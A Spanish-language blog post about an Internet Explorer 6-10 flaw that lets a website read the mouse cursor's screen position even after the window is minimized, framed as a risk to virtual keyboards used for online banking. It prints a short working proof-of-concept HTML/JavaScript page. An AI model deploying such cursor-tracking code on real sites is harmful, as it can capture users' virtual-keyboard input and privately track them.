Colombia se destaca siempre por estar a la vanguardia de la zaga y la informática no es una excepción. El sector público hace una lenta transición a tecnologías más seguras, confiables y los más avezados, a tecnologías abiertas, con inevitables traspiés que normalmente vienen de la ignorancia. Lo que pasa es que la ignorancia no está mal, lo que está mal es la voluntad de seguir en ella.
En este caso el problema está en un fallo de Internet Explorer que es utilizado por muchas instituciones públicas como navegador por defecto, sin actualizaciones, así como viene, como lo vendió el que se "ganó" el contrato. Este problema afecta directamente a los usuarios, a usted más que a mí pues hace mucho tiempo no uso IE, ni siquiera con su agresiva
campaña de mercadeo para promocionar su más reciente versión.
La cantidad de usuarios de Internet Explorer en Colombia afortunadamente no es la mayoría, sin embargo ocupa el segundo lugar según
StatCounter.
[caption id="attachment_258986" align="aligncenter" width="300" caption="Tendencia en uso de navegadores en Colombia - Click para ir a la fuente"]
[/caption]
En Colombia la penetración de internet en la población es
relativamente alta, llegando casi al 60%, obviamente haciendo cuentas como se hacen aquí, sin mucho rigor estadístico y usando
datos sospechosos, la cantidad de usuarios de IE en Colombia ronda los 4.5 millones. En esto estoy sujeto a que el ejército ñoño me corrija con todo el rigor del caso.
Internet Explorer? Tenemos problemas.
¿Qué pasaría si el administrador de un sitio web pudiera saber en qué punto de su pantalla está el cursor del mouse incluso después de minimizar su ventana o abrir una nueva?
La respuesta a esta pregunta pareciera no ser preocupante, excepto si viviéramos en un tiempo en donde los teclados virtuales son pan de cada día. Para usar nuestro dinero, para acceder a nuestras cuentas personales, para movernos en internet. (Bancolombia rings a bell?)
Spider.io publicó una entrada en su blog que describe un ataque a IE v6 hasta v10 que permite a un sitio web obtener esta información.
Este es el exploit en versión ñoño porque nuestro será el reino:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent("onload", function() {
var detector = document.getElementById("detector");
detector.attachEvent("onmousemove", function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent("onmousemove");
}, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html>
Dado que no todos tienen el privilegio de ser ñoños, el equipo que halló el fallo de seguridad creó una demostración más directa, trata el caso de el teclado virtual que usa Skype.
[youtube]http://www.youtube.com/watch?v=qxUa2VWnE8A[/youtube]
El fallo en cuestión ya está siendo explotado por algunas empresas de web analytics, así que de alguna forma ya podríamos ser víctimas. (Insert creepy death march here.)
Cabe anotar que en Colombia es más baja la probabilidad de ser atacado a través internet que en la calle (otra vez mi estadística sin estadística, pero la intuición me dice que estoy en lo cierto), así que yo seguiré haciendo mis operaciones via internet. Sin embargo parte de mi plan de riesgos es nunca usar
Internet Explorer. Existen muchas otras precauciones que una persona juiciosa podría tomar, pero lo cierto es que en internet como en la calle, a pesar de todas las precauciones, nunca se está 100% seguro.
Ahí nos vemos.
@mojitoking
PS: El lunes pasado Chrome tuvo hipo por un fallo en el sistema de sync en la "nube", así que si ud es asustadizo váyase con Firefox sin plugins.
